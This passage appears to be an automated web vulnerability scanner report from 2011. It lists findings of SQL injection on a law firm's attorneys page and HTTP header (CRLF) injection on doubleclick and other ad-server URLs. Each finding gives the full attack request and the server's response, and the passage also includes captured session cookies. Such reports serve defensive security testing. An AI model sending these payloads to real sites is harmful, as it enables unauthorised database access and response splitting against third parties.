Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224978318%3a%3bC25%5fEXP%3d1360064978%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:49:38 GMT;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224978318%3a%3bC25%5fEXP%3d1360064978%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:49:38 GMT;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%22116%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%24163%2c284%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816978%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224978318%3a%3bC25%5fEXP%3d1360064978%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:49:38 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308228578979%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2c8qveuGAl9W05TXvVDWRecbIcxoE%3d;Domain=.homedepot.com;Path=/

1.74. http://www.nutter.com/attorneys.php [AttorneyID parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.nutter.com
Path:	/attorneys.php

Issue detail

The AttorneyID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the AttorneyID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /attorneys.php?AttorneyID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))' HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:41:20 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 22671

error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 | 1064<BR>sql: SELECT FirstName,LastName FRO
...[SNIP]...

1.75. http://www.nutter.com/attorneys.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.nutter.com
Path:	/attorneys.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /attorneys.php?AttorneyID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit/1'+1)) HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

2. HTTP header injection previous next
There are 26 instances of this issue:

http://ad.doubleclick.net/activity [REST URL parameter 1]
http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.3 [REST URL parameter 1]
http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.4 [REST URL parameter 1]
http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8 [REST URL parameter 1]
http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber [REST URL parameter 1]
http://ad.doubleclick.net/adi/interactive.wsj.com/forgotpassword [REST URL parameter 1]
http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub [REST URL parameter 1]
http://ad.doubleclick.net/adj/N1057.280341.AOL.COMADVERTISING/B5447531.7 [REST URL parameter 1]
http://ad.doubleclick.net/adj/N4190.advertising.com/B5416523.2 [REST URL parameter 1]
http://ad.doubleclick.net/adj/N6046.134363.2043285697521/B5118749.4 [REST URL parameter 1]
http://ad.doubleclick.net/adj/interactive.wsj.com/front_nonsub [REST URL parameter 1]
http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus [REST URL parameter 1]
http://ad.doubleclick.net/adj/nbcu.cnbc/news_us [REST URL parameter 1]
http://ad.doubleclick.net/adj/nbcu.cnbc/search [REST URL parameter 1]
http://ads.cleveland.com/RealMedia/ads/adstream.cap [c parameter]
http://ads.cleveland.com/RealMedia/ads/adstream.cap [va parameter]
http://ads.nj.com/RealMedia/ads/adstream.cap [c parameter]
http://ads.nj.com/RealMedia/ads/adstream.cap [va parameter]
http://ads.oregonlive.com/RealMedia/ads/adstream.cap [c parameter]
http://ads.oregonlive.com/RealMedia/ads/adstream.cap [va parameter]
http://c7.zedo.com/img/bh.gif [a parameter]
http://matcher.bidder7.mookie1.com/google [cver parameter]
http://tacoda.at.atwola.com/rtx/r.gif [N cookie]
http://tacoda.at.atwola.com/rtx/r.gif [si parameter]
http://www.wunderground.com/dotset.php [id parameter]
http://www.wunderground.com/dotset.php [name of an arbitrarily supplied request parameter]

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

2.1. http://ad.doubleclick.net/activity [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/activity

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d9fc1%0d%0a6b3dc4ec589 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /d9fc1%0d%0a6b3dc4ec589;src=1948992;type=wsjre849;cat=publi675;ord=5535785951651.633? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/d9fc1
6b3dc4ec589;src=1948992;type=wsjre849;cat=publi675;ord=5535785951651.633:
Date: Thu, 16 Jun 2011 11:23:29 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.2. http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.3 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.specificmedia.com/B4970757.3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4ff25%0d%0ae23aa2286a8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4ff25%0d%0ae23aa2286a8/N553.specificmedia.com/B4970757.3;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=2%3Bl=4749%3Bc=124110%3Bb=740428%3Bts=1308235498%3Bdct=;ord=1308235498? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/serve/v=5;m=3;l=4749;c=124110;b=740428;ts=20110616104458
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4ff25
e23aa2286a8/N553.specificmedia.com/B4970757.3;sz=300x250;pc=[TPAS_ID];click=http: //clk.specificclick.net/click/v=5;m=2;l=4749;c=124110;b=740428;ts=1308235498;dct=;ord=1308235498
Date: Thu, 16 Jun 2011 14:46:07 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.3. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.4 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.RealMedia/B5598690.4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3738f%0d%0a1fc365d485d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3738f%0d%0a1fc365d485d/N5823.RealMedia/B5598690.4;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/1199171978/Top1/USNetwork/BCN2011050712_001_HP/HP_728x90.html/726348573830336e374e674144526a62?;ord=1199171978? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73e.js&size_id=2&account_id=6451&site_id=11953&size=728x90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3738f
1fc365d485d/N5823.RealMedia/B5598690.4;sz=728x90;click0=http: //network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/1199171978/Top1/USNetwork/BCN2011050712_001_HP/HP_728x90.html/726348573830336e374e674144526a62
Date: Thu, 16 Jun 2011 15:53:16 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.4. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.RealMedia/B5598690.8

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9d630%0d%0a3989d204e3c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9d630%0d%0a3989d204e3c/N5823.RealMedia/B5598690.8;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/473239540/Top1/USNetwork/BCN2011050712_002_HP/HP_ron_728x90.html/726348573830336e374e674144526a62?;ord=473239540? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73e.js&size_id=2&account_id=6451&site_id=11953&size=728x90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9d630
3989d204e3c/N5823.RealMedia/B5598690.8;sz=728x90;click0=http: //network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/473239540/Top1/USNetwork/BCN2011050712_002_HP/HP_ron_728x90.html/726348573830336e374e674144526a62
Date: Thu, 16 Jun 2011 16:03:38 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.5. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/brokerbuttons.wsj.com/us_subscriber

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 587d7%0d%0a016d0289655 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /587d7%0d%0a016d0289655/brokerbuttons.wsj.com/us_subscriber;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;pos=1;tile=5;sz=170x67;ord=8144814481448144; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/587d7
016d0289655/brokerbuttons.wsj.com/us_subscriber;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;pos=1;tile=5;sz=170x67;ord=8144814481448144;:
Date: Thu, 16 Jun 2011 11:23:56 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.6. http://ad.doubleclick.net/adi/interactive.wsj.com/forgotpassword [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/interactive.wsj.com/forgotpassword

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7c02a%0d%0a9333c1f4750 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7c02a%0d%0a9333c1f4750/interactive.wsj.com/forgotpassword;mc=b2pfreezone;tile=1;sz=377x50;ord=3076307630763076; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/WSJThirdParty_Header_Nav_Commerce.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7c02a
9333c1f4750/interactive.wsj.com/forgotpassword;mc=b2pfreezone;tile=1;sz=377x50;ord=3076307630763076;:
Date: Thu, 16 Jun 2011 11:25:46 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.7. http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/interactive.wsj.com/front_nonsub

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 57946%0d%0a3ad065f0f29 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /57946%0d%0a3ad065f0f29/interactive.wsj.com/front_nonsub;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=2;sz=280x46;ord=8144814481448144; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/57946
3ad065f0f29/interactive.wsj.com/front_nonsub;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=2;sz=280x46;ord=8144814481448144;:
Date: Thu, 16 Jun 2011 11:23:41 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.8. http://ad.doubleclick.net/adj/N1057.280341.AOL.COMADVERTISING/B5447531.7 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N1057.280341.AOL.COMADVERTISING/B5447531.7

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 49a4e%0d%0afea689c0339 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /49a4e%0d%0afea689c0339/N1057.280341.AOL.COMADVERTISING/B5447531.7;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0001024394/cstr=54039788=_4dfa4b0b,6354081067,768034%5E1024394%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=54039788/optn=64?trg=;ord=6354081067? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308248841013&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/49a4e
fea689c0339/N1057.280341.AOL.COMADVERTISING/B5447531.7;sz=728x90;click=http: //r1-ads.ace.advertising.com/click/site=0000768034/mnum=0001024394/cstr=54039788=_4dfa4b0b,6354081067,768034^1024394^1183^0,1_/xsxdata=$xsxdata/bnum=54039788/optn=64
Date: Thu, 16 Jun 2011 18:28:31 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.9. http://ad.doubleclick.net/adj/N4190.advertising.com/B5416523.2 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4190.advertising.com/B5416523.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1215f%0d%0a1faea7da71e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1215f%0d%0a1faea7da71e/N4190.advertising.com/B5416523.2;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0001008685/cstr=3488355=_4dfa5250,1828847536,768034%5E1008685%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=3488355/optn=64?trg=;ord=1828847536? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308250703177&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1215f
1faea7da71e/N4190.advertising.com/B5416523.2;sz=728x90;click=http: //r1-ads.ace.advertising.com/click/site=0000768034/mnum=0001008685/cstr=3488355=_4dfa5250,1828847536,768034^1008685^1183^0,1_/xsxdata=$xsxdata/bnum=3488355/optn=64
Date: Thu, 16 Jun 2011 18:59:31 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.10. http://ad.doubleclick.net/adj/N6046.134363.2043285697521/B5118749.4 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N6046.134363.2043285697521/B5118749.4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 91c76%0d%0a816a901a517 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /91c76%0d%0a816a901a517/N6046.134363.2043285697521/B5118749.4;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000993430/cstr=33615280=_4dfa54c7,4721737206,768033%5E993430%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=33615280/optn=64?trg=;ord=4721737206? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308251334943&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/91c76
816a901a517/N6046.134363.2043285697521/B5118749.4;sz=300x250;click=http: //r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000993430/cstr=33615280=_4dfa54c7,4721737206,768033^993430^1183^0,1_/xsxdata=$xsxdata/bnum=33615280/optn=64
Date: Thu, 16 Jun 2011 19:10:01 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.11. http://ad.doubleclick.net/adj/interactive.wsj.com/front_nonsub [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/interactive.wsj.com/front_nonsub

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 82c25%0d%0ad0abc40537d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /82c25%0d%0ad0abc40537d/interactive.wsj.com/front_nonsub;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=8;sz=336x280,300x250;ord=8144814481448144; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/front_nonsub;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=8;sz=336x280,300x250;ord=8144814481448144;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
